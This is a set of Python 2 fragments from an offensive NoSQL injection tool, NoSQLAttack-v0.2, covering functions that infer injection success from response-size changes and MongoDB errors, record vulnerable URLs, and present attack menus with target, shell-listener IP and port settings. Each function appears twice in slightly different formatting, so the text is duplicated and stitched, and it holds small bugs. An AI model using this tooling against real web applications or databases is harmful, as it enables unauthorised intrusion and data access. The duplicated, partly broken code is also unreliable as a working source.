def checkResult(baseSize, respSize, index, uriArray):
delta = abs(respSize - baseSize)
if (delta >= 100) and (respSize != 0):
if GlobalVar.get_verb() == "ON":
print "Response varied " + str(
delta) + " bytes from random parameter value! Injection works!"
else:
print "Successful injection!"
if GlobalVar.get_httpMethod() == "GET":
GlobalVar.get_vulnAddrs().append(uriArray[index])
else:
post = 0
#post
return
elif (delta > 0) and (delta < 100) and (respSize != 0):
if GlobalVar.get_verb() == "ON":
print "Response variance was only " + str(
delta
) + " bytes. Injection might have worked but difference is too small to be certain. "
else:
print "Possible injection."
if GlobalVar.get_httpMethod() == "GET":
GlobalVar.get_possAddrs().append(uriArray[index])
else:
post = 0
# post
return
elif (delta == 0):
if GlobalVar.get_verb() == "ON":
print "Random string response size and not equals injection were the same. Injection did not work."
else:
print "Injection failed."
return
else:
if GlobalVar.get_verb() == "ON":
print "Injected response was smaller than random response. Injection may have worked but requires verification."
else:
print "Possible injection."
if GlobalVar.get_httpMethod() == "GET":
GlobalVar.get_possAddrs.append(uriArray[index])
else:
post = 0
# post
return
def checkResult(baseSize, respSize, index,uriArray):
delta = abs(respSize - baseSize)
if (delta >= 100) and (respSize != 0):
if GlobalVar.get_verb() == "ON":
print "Response varied " + str(delta) + " bytes from random parameter value! Injection works!"
else:
print "Successful injection!"
if GlobalVar.get_httpMethod() == "GET":
GlobalVar.get_vulnAddrs().append(uriArray[index])
else:
post = 0
#post
return
elif (delta > 0) and (delta < 100) and (respSize != 0):
if GlobalVar.get_verb() == "ON":
print "Response variance was only " + str(
delta) + " bytes. Injection might have worked but difference is too small to be certain. "
else:
print "Possible injection."
if GlobalVar.get_httpMethod() == "GET":
GlobalVar.get_possAddrs().append(uriArray[index])
else:
post = 0
# post
return
elif (delta == 0):
if GlobalVar.get_verb() == "ON":
print "Random string response size and not equals injection were the same. Injection did not work."
else:
print "Injection failed."
return
else:
if GlobalVar.get_verb() == "ON":
print "Injected response was smaller than random response. Injection may have worked but requires verification."
else:
print "Possible injection."
if GlobalVar.get_httpMethod() == "GET":
GlobalVar.get_possAddrs.append(uriArray[index])
else:
post = 0
# post
return
def mainMenu():
global platform
global victim
global dbPort
global myIP
global myPort
mmSelect = True
while mmSelect:
os.system('clear')
print "==============================================="
print " _ _ _____ _____ _ "
print " | \ | | / ___|| _ | | "
print " | \| | ___ \ `--. | | | | | "
print " | . ` |/ _ \ `--. \| | | | | "
print " | |\ | (_) /\__/ /\ \/' / |____ "
print " \_| \_/\___/\____/ \_/\_\_____/ "
print " _ "
print " /\ _ _ | | _ "
print " / \ _| |_ _| |_ _____ ___ | | / / "
print " / /\ \ |_ _||_ _| / __ \ / __| | |/ / "
print " / /--\ \ | | | |_ | |_| | ||__ | |\ \ "
print "/ / -- \ \ \___\ \___\ \______\ \___| | | \_\ "
print "=============================================== "
print "NoSQLAttack-v0.2"
print "*****@*****.**"
print "\n"
print "1-Scan attacked IP"
print "2-Configurate parameters"
print "3-MongoDB Access Attacks"
print "4-Injection Attacks"
# print "4-Scan for Anonymous " + platform + " Access"
# print "5-Change Platform (Current: " + platform + ")"
print "x-Exit"
select = raw_input("Select an option:")
if select == "1":
scanMongoDBIP()
if select == "2":
option.option()
elif select == "3":
if (GlobalVar.get_optionSet(0) == True
and GlobalVar.get_optionSet(4) == True):
if platform == "MongoDB":
netAttacks(GlobalVar.get_victim(), GlobalVar.get_dbPort(),
GlobalVar.get_myIP(), GlobalVar.get_myPort())
elif select == "4":
if (GlobalVar.get_optionSet(0)
== True) and (GlobalVar.get_optionSet(2) == True):
if GlobalVar.get_httpMethod() == "GET":
getApps()
elif select == "x":
sys.exit()
else:
raw_input("Invalid selection. Press enter to continue.")
def errorTest(errorText, index, uriArray):
if errorText.find('ReferenceError') != -1 or errorText.find('SyntaxError') != -1 or errorText.find('ILLEGAL') != -1:
print "Injection returned a MongoDB Error. Injection may be possible."
if GlobalVar.get_httpMethod() == "GET":
GlobalVar.set_possAddrs(uriArray[index])
return True
else:
post = 0
#post
else:
return False
def mainMenu():
global platform
global victim
global dbPort
global myIP
global myPort
mmSelect = True
while mmSelect:
os.system('clear')
print "==============================================="
print " _ _ _____ _____ _ "
print " | \ | | / ___|| _ | | "
print " | \| | ___ \ `--. | | | | | "
print " | . ` |/ _ \ `--. \| | | | | "
print " | |\ | (_) /\__/ /\ \/' / |____ "
print " \_| \_/\___/\____/ \_/\_\_____/ "
print " _ "
print " /\ _ _ | | _ "
print " / \ _| |_ _| |_ _____ ___ | | / / "
print " / /\ \ |_ _||_ _| / __ \ / __| | |/ / "
print " / /--\ \ | | | |_ | |_| | ||__ | |\ \ "
print "/ / -- \ \ \___\ \___\ \______\ \___| | | \_\ "
print "=============================================== "
print "NoSQLAttack-v0.2"
print "*****@*****.**"
print "\n"
print "1-Scan attacked IP"
print "2-Configurate parameters"
print "3-MongoDB Access Attacks"
print "4-Injection Attacks"
# print "4-Scan for Anonymous " + platform + " Access"
# print "5-Change Platform (Current: " + platform + ")"
print "x-Exit"
select = raw_input("Select an option:")
if select == "1":
scanMongoDBIP()
if select == "2":
option.option();
elif select == "3":
if(GlobalVar.get_optionSet(0) == True and GlobalVar.get_optionSet(4) == True):
if platform == "MongoDB":
netAttacks( GlobalVar.get_victim(),GlobalVar.get_dbPort(),GlobalVar.get_myIP(),GlobalVar.get_myPort())
elif select == "4":
if(GlobalVar.get_optionSet(0) == True) and (GlobalVar.get_optionSet(2) == True):
if GlobalVar.get_httpMethod() == "GET":
getApps()
elif select == "x":
sys.exit()
else:
raw_input("Invalid selection. Press enter to continue.")
def option():
'''
global victim
global webPort
global uri
global https
https = 1
global platform
global httpMethod
global postData
global myIP
global myPort
global verb
global mmSelect
global dbPort
global requestHeaders#
global optionSet
optionSet = [False]*9
# GlobalVar.set_optionSet(0,True);
# print GlobalVar.get_optionSet(0);
requestHeaders = {}
'''
optSelect = True
#print "test"
if GlobalVar.get_optionSet(0) == False:
# if optionSet[0] == False:
GlobalVar.set_victim("Not Set")
if GlobalVar.get_optionSet(1) == False:
GlobalVar.set_webPort(80)
GlobalVar.set_optionSet(1,True)
if GlobalVar.get_optionSet(2) == False: #Set App Path (Current: Not Set)
GlobalVar.set_url("Not Set")
if GlobalVar.get_optionSet(3) == False:
GlobalVar.set_httpMethod("GET")
if GlobalVar.get_optionSet(4) == False:
GlobalVar.set_myIP("127.0.0.1")
GlobalVar.set_optionSet(4, True)
if GlobalVar.get_optionSet(5) == False:
GlobalVar.set_myPort("Not Set")
if GlobalVar.get_optionSet(6) == False:
GlobalVar.set_verb("OFF")
if GlobalVar.get_optionSet(8) == False:
GlobalVar.set_https("OFF")
GlobalVar.set_optionSet(8, True)
while optSelect:
print "\n\n"
print "Options"
print "1-Set target host/IP (Current: " + str(GlobalVar.get_victim()) + ")"
print "2-Set web app port (Current: " + str(GlobalVar.get_webPort()) + ")"
print "3-Set App Path (Current: " + str(GlobalVar.get_url()) + ")"
print "4-Toggle HTTPS (Current: " + str(GlobalVar.get_https()) + ")" # set http or https
print "5-Set " + GlobalVar.get_platform() + " Port (Current : " + str(GlobalVar.get_dbPort()) + ")"
print "6-Set HTTP Request Method (GET/POST) (Current: " + GlobalVar.get_httpMethod() + ")"
print "7-Set my local " + GlobalVar.get_platform() + "/Shell IP (Current: " + str(GlobalVar.get_myIP()) + ")"
print "8-Set shell listener port (Current: " + str(GlobalVar.get_myPort()) + ")"
print "9-Toggle Verbose Mode: (Current: " + str(GlobalVar.get_verb()) + ")" # more detail infor while attacking
print "x-Back to main menu"
select = raw_input("Set an option:")
if select == '1':
# optionSet[0] = False
GlobalVar.set_optionSet(0,False) #if reset host ip, optionSet[0] should be false again
while GlobalVar.get_optionSet(0) == False:
notDNS = True
goodDigits = True
victim = raw_input("Enter host or IP/DNS name:")
octets = victim.split(".")
if len(octets) != 4:
GlobalVar.set_optionSet(0,False)
notDNS = False
else:
for item in octets:
try:
if int(item)<0 or int(item)>255:
print "Bad octets in IP address."
goodDigits = False
except:
notDNS = False
if goodDigits == True or notDNS == False:
print "\nTarget set to:" + victim + "\n"
GlobalVar.set_victim(victim)
GlobalVar.set_optionSet(0,True)
elif select == '3':
url = raw_input("Enter URL path(Press enter for no URL):")
print "\nHTTP port set to " + str(GlobalVar.get_webPort()) + "\n"
GlobalVar.set_optionSet(2,True)
GlobalVar.set_url(url)
elif select == '7':
GlobalVar.set_optionSet(4,False)
while GlobalVar.get_optionSet(4) == False:
goodLen = False
goodDigits = True
myIP = raw_input("Enter host IP for my "+ GlobalVar.get_platform() +"/Shells:")
octets = myIP.split(".")
if len(octets) != 4:
print "Invalid IP length."
else:
goodLen = True
for item in octets:
try:
if int(item)<0 or int(item)>255:
print "Bad octets in IP address."
goodDigits = False
except:
goodDigits = False
if goodDigits == True and goodLen == True:
print "\nShell/DB listener set to "+ myIP +"\n"
GlobalVar.set_myIP(myIP)
GlobalVar.set_optionSet(4,True)
elif select == "9":
if GlobalVar.get_verb() == "OFF":
print "Verbose output enabled."
GlobalVar.set_verb("ON")
GlobalVar.set_optionSet(6,True)
elif GlobalVar.get_verb() == "ON":
print "Verbose output disabled."
GlobalVar.set_verb("OFF")
GlobalVar.set_optionSet(6, True)
elif select == 'x':
return
def option():
'''
global victim
global webPort
global uri
global https
https = 1
global platform
global httpMethod
global postData
global myIP
global myPort
global verb
global mmSelect
global dbPort
global requestHeaders#
global optionSet
optionSet = [False]*9
# GlobalVar.set_optionSet(0,True);
# print GlobalVar.get_optionSet(0);
requestHeaders = {}
'''
optSelect = True
#print "test"
if GlobalVar.get_optionSet(0) == False:
# if optionSet[0] == False:
GlobalVar.set_victim("Not Set")
if GlobalVar.get_optionSet(1) == False:
GlobalVar.set_webPort(80)
GlobalVar.set_optionSet(1, True)
if GlobalVar.get_optionSet(2) == False: #Set App Path (Current: Not Set)
GlobalVar.set_url("Not Set")
if GlobalVar.get_optionSet(3) == False:
GlobalVar.set_httpMethod("GET")
if GlobalVar.get_optionSet(4) == False:
GlobalVar.set_myIP("127.0.0.1")
GlobalVar.set_optionSet(4, True)
if GlobalVar.get_optionSet(5) == False:
GlobalVar.set_myPort("Not Set")
if GlobalVar.get_optionSet(6) == False:
GlobalVar.set_verb("OFF")
if GlobalVar.get_optionSet(8) == False:
GlobalVar.set_https("OFF")
GlobalVar.set_optionSet(8, True)
while optSelect:
print "\n\n"
print "Options"
print "1-Set target host/IP (Current: " + str(
GlobalVar.get_victim()) + ")"
print "2-Set web app port (Current: " + str(
GlobalVar.get_webPort()) + ")"
print "3-Set App Path (Current: " + str(GlobalVar.get_url()) + ")"
print "4-Toggle HTTPS (Current: " + str(
GlobalVar.get_https()) + ")" # set http or https
print "5-Set " + GlobalVar.get_platform() + " Port (Current : " + str(
GlobalVar.get_dbPort()) + ")"
print "6-Set HTTP Request Method (GET/POST) (Current: " + GlobalVar.get_httpMethod(
) + ")"
print "7-Set my local " + GlobalVar.get_platform(
) + "/Shell IP (Current: " + str(GlobalVar.get_myIP()) + ")"
print "8-Set shell listener port (Current: " + str(
GlobalVar.get_myPort()) + ")"
print "9-Toggle Verbose Mode: (Current: " + str(
GlobalVar.get_verb()) + ")" # more detail infor while attacking
print "x-Back to main menu"
select = raw_input("Set an option:")
if select == '1':
# optionSet[0] = False
GlobalVar.set_optionSet(
0,
False) #if reset host ip, optionSet[0] should be false again
while GlobalVar.get_optionSet(0) == False:
notDNS = True
goodDigits = True
victim = raw_input("Enter host or IP/DNS name:")
octets = victim.split(".")
if len(octets) != 4:
GlobalVar.set_optionSet(0, False)
notDNS = False
else:
for item in octets:
try:
if int(item) < 0 or int(item) > 255:
print "Bad octets in IP address."
goodDigits = False
except:
notDNS = False
if goodDigits == True or notDNS == False:
print "\nTarget set to:" + victim + "\n"
GlobalVar.set_victim(victim)
GlobalVar.set_optionSet(0, True)
elif select == '3':
url = raw_input("Enter URL path(Press enter for no URL):")
print "\nHTTP port set to " + str(GlobalVar.get_webPort()) + "\n"
GlobalVar.set_optionSet(2, True)
GlobalVar.set_url(url)
elif select == '7':
GlobalVar.set_optionSet(4, False)
while GlobalVar.get_optionSet(4) == False:
goodLen = False
goodDigits = True
myIP = raw_input("Enter host IP for my " +
GlobalVar.get_platform() + "/Shells:")
octets = myIP.split(".")
if len(octets) != 4:
print "Invalid IP length."
else:
goodLen = True
for item in octets:
try:
if int(item) < 0 or int(item) > 255:
print "Bad octets in IP address."
goodDigits = False
except:
goodDigits = False
if goodDigits == True and goodLen == True:
print "\nShell/DB listener set to " + myIP + "\n"
GlobalVar.set_myIP(myIP)
GlobalVar.set_optionSet(4, True)
elif select == "9":
if GlobalVar.get_verb() == "OFF":
print "Verbose output enabled."
GlobalVar.set_verb("ON")
GlobalVar.set_optionSet(6, True)
elif GlobalVar.get_verb() == "ON":
print "Verbose output disabled."
GlobalVar.set_verb("OFF")
GlobalVar.set_optionSet(6, True)
elif select == 'x':
return